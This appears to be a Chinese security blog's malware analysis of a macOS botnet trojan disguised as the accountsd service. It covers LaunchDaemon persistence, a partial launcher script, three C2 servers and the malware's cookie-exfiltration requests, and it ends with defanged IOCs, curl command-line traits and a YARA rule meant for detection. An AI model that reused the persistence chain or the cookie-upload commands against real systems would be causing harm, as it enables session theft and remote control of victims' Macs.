文章总结： 本文分析了一款伪装为macOS系统服务accountsd的Botnet木马。该木马经搜索引擎投毒分发，利用LaunchDaemon持久化，三组C2分别负责入网注册、任务轮询与浏览器Cookie窃取外传，近期新增备用域名显示其基础设施持续扩张。建议利用文末IOC及YARA规则开展排查溯源。 综合评分： 90 文章分类： 恶意软件,威胁情报,逆向分析,应急响应

伪装 accountsd 的 macOS Botnet 木马分析

原创

小东2025 小东2025

小东安全日记

2026年5月10日 00:11 浙江

在小说阅读器读本章

去阅读

| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | — | | | | | — | | 声明 ：本文基于真实终端告警与样本落地痕迹整理。恶意基础设施已做 defang 处理，仅用于安全研究与排查参考。涉及的用户名、Bot ID 等敏感信息已脱敏。 | 一、快速概览 此前在 macOS 终端捕获到一起 Botnet 木马样本。该样本伪装为系统服务 accountsd，通过搜索引擎投毒分发，感染后持续与 C2 通信并外传浏览器 Cookie。今天观察发现该木马新增了多个备用 C2 域名，基础设施持续扩张。现将已知分析结果及 IOC 整理如下，供排查溯源使用。 二、详细分析2.1 感染与启动链路 用户运行假冒安装程序后，恶意组件被释放至用户目录： /Users/<user>/Library/Application Support/.com.apple.accountsd/ 恶意文件清单 | 文件 | 类型 | 作用 | | — | — | — | | AccountsHelper | Mach-O universal | 主恶意程序，负责 C2 通信与数据窃取 | | .service | Shell 脚本 | 循环检测用户登录状态并启动主程序 | | .cfg | 配置文件 | 保存初始化入网参数，与首次注册请求一致 | | .auth | 认证文件 | 保存 Bot ID，用于任务轮询身份认证 | | .session | 会话文件 | 保存样本运行状态或版本信息 | 主程序 Hash | | | — | | SHA256: fe0292909127298afd0bfdc3a6c66dd10664cd08560d602d5d13b03791c90d93 MD5: e62c152a63117e4d62c4a11a3af566a3 Size: 273616 bytes | 启动流程 样本使用 LaunchDaemon 实现系统级持久化，落地位置为 /Library/LaunchDaemons/com.apple.accountsd.helper.plist，拉起用户目录中的 .service 脚本。脚本核心逻辑如下： | | | — | | while true; do     osascript </Library/Application Support/.com.apple.accountsd/AccountsHelper'” end if EOF     sleep 1 done | 完整执行链 | 层级 | 组件 | 说明 | | — | — | — | | 1. 持久化入口 | LaunchDaemon（root） | 系统开机自动加载 | | 2. 启动脚本 | /bin/bash → .service | 循环检测用户登录状态 | | 3. 用户检测 | osascript | AppleScript 获取当前登录用户 | | 4. 身份切换 | sudo -u | 以当前登录用户身份执行 | | 5. 恶意逻辑 | AccountsHelper | 连接 C2，执行入网、轮询、上传 | 2.2 C2 通信架构 样本使用三组 C2 基础设施，分工明确： | C2 地址 | 角色 | 接口 | 说明 | | — | — | — | — | | 94[.]232[.]249[.]129 | 主 C2 | /api/join/ /api/tasks/ack | 入网注册与任务轮询，约一分钟一次 | | okcuipid[.]com | 数据上传 | /api/bots/device-info /api/cookies | 设备信息上报与 Cookie 压缩包上传 | | sunds[.]gd | 备用 C2 | 待分析 | 近期新增，具体协议待分析 | 感染行为时序 1. 携带 .cfg 注册参数向主 C2 发起入网请求，完成 Botnet 加入； 2. 携带 .auth 中的 Bot ID 发起任务轮询，进入持续任务等待状态； 3. 向上传域名上报设备信息； 4. 将 /tmp/.ck_*.zip（Cookie 压缩包）上传至 /api/cookies 接口； 5. 后续出现备用 C2 连接，样本具备 C2 切换能力。 2.3 各阶段详细分析 （1）入网注册 — .cfg 与首次请求吻合 首次通信向主 C2 发起入网请求： | | | — | | POST hxxp://94[.]232[.]249[.]129/api/join/   → 携带 .cfg 中的初始化参数 | 本地 .cfg 文件内容与该请求的 POST 参数完全一致。.cfg 并非无关配置，而是样本初始化入网时直接使用的注册参数。 （2）任务轮询 — .auth 与 Bot ID 吻合 入网成功后，样本进入任务轮询阶段： | | | — | | POST hxxp://94[.]232[.]249[.]129/api/tasks/ack   → uid=&id= | 本地 .auth 文件保存的 Bot ID 与日志中的 uid 参数完全一致。感染期间样本与主 C2 保持高频通信，呈现约一分钟一次的周期性轮询特征。 （3）数据上传 — Cookie 窃取外传 样本向上传域名发送 HTTPS POST 请求： | | | — | | POST hxxps://okcuipid[.]com/api/bots/device-info   → 上报 Bot 标识与浏览器版本等设备信息 POST hxxps://okcuipid[.]com/api/cookies   → 上传 /tmp/.ck_*.zip（浏览器 Cookie 压缩包） | 使用 -k 忽略 TLS 证书校验，-fSL 处理 HTTP 错误和静默输出。感染期间存在多次设备信息上报和 Cookie 数据上传行为。 （4）备用 C2 域名增多 感染期间还观察到 sunds[.]gd 相关连接。结合近期趋势，该木马家族正在增加备用 C2 域名，具备一定的动态基础设施切换能力。 2.4 证据链汇总 | 证据链 | 关联 | 判定 | | — | — | — | | 持久化 | LaunchDaemon → .service → AccountsHelper | 恶意组件已完成持久化部署 | | 入网注册 | .cfg 文件内容 == 首次 /api/join/ 请求参数 | 设备已完成 Botnet 入网注册 | | Bot 身份 | .auth 文件内容 == /api/tasks/ack 请求 uid | 设备已加入 Botnet 并接受任务调度 | | 数据外传 | /tmp/.ck_*.zip → okcuipid[.]com/api/cookies | 浏览器 Cookie/会话数据被外传 | | 周期性控制 | 主 C2 高频连接，约一分钟一次轮询 | 具备持续控制能力的 Botnet 客户端 | 上述证据共同支撑三个判断： 1. 主机已完成恶意组件落地与持久化； 2. 主机已加入攻击者控制的 Botnet； 3. 感染期间存在浏览器 Cookie/会话数据外传行为。 — 三、IOC 以下 IOC 仅用于安全检测，域名与 IP 已做 defang 处理。按置信度分为两类，可直接用于安全软件拉黑与溯源分析。 3.1 确切 IOC（命中即可判定感染） 样本 Hash | | | — | | SHA256: fe0292909127298afd0bfdc3a6c66dd10664cd08560d602d5d13b03791c90d93 MD5: e62c152a63117e4d62c4a11a3af566a3 | 恶意文件路径 | | | — | | /Library/LaunchDaemons/com.apple.accountsd.helper.plist /Users//Library/Application Support/.com.apple.accountsd/ /Users//Library/Application Support/.com.apple.accountsd/AccountsHelper /Users//Library/Application Support/.com.apple.accountsd/.service /Users//Library/Application Support/.com.apple.accountsd/.cfg /Users//Library/Application Support/.com.apple.accountsd/.auth | C2 地址与 URL | | | — | | IP: 94[.]232[.]249[.]129 域名: okcuipid[.]com 域名: sunds[.]gd URL: hxxp://94[.]232[.]249[.]129/api/join/ hxxp://94[.]232[.]249[.]129/api/tasks/ack hxxps://okcuipid[.]com/api/bots/device-info hxxps://okcuipid[.]com/api/cookies | 数据外传文件 | | | — | | /tmp/.ck_*.zip （浏览器 Cookie 压缩包） | — 3.2 排查辅助 IOC 进程与命令行特征 | | | — | | 进程名: AccountsHelper plist: com.apple.accountsd.helper.plist AppleScript: stat -f “%Su” /dev/console 命令行: sudo -u …AccountsHelper curl 路径: /api/join/ /api/tasks/ack /api/bots/device-info /api/cookies curl 参数: –data-binary @/tmp/.ck_*.zip | 行为特征 | | | — | | · LaunchDaemon + .service + osascript 用户检测 + curl 外联 组合 · 对外连接呈现约一分钟一次的周期性轮询 · 使用 -k 忽略 TLS 校验、-fSL 处理 HTTP 错误 · 用户目录下出现 .com.apple.* 隐藏目录，内含 .service / .cfg / .auth 等文件 | 日志关键字 | | | — | | AccountsHelper com.apple.accountsd.helper stat -f “%Su” /dev/console /api/join/ /api/tasks/ack /api/cookies /tmp/.ck_ | — 3.3 YARA 规则 | | | — | | rule macOS_Accountsd_Botnet {     meta:         description = “Detects macOS Botnet masquerading as accountsd”         date = “2026-05-09”     strings:         $s1 = “accountsd” ascii         $s2 = “/api/join/” ascii         $s3 = “/api/tasks/ack” ascii         $s4 = “/api/cookies” ascii         $s5 = “/api/bots/device-info” ascii         $s6 = “stat -f \”%Su\” /dev/console” ascii     condition:         any of them } | — 作者：夏志鹏 小东  本文仅用于安全研究与教育目的 · 2026-05-09 |

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：小东安全日记 小东2025 小东2025《伪装 accountsd 的 macOS Botnet 木马分析》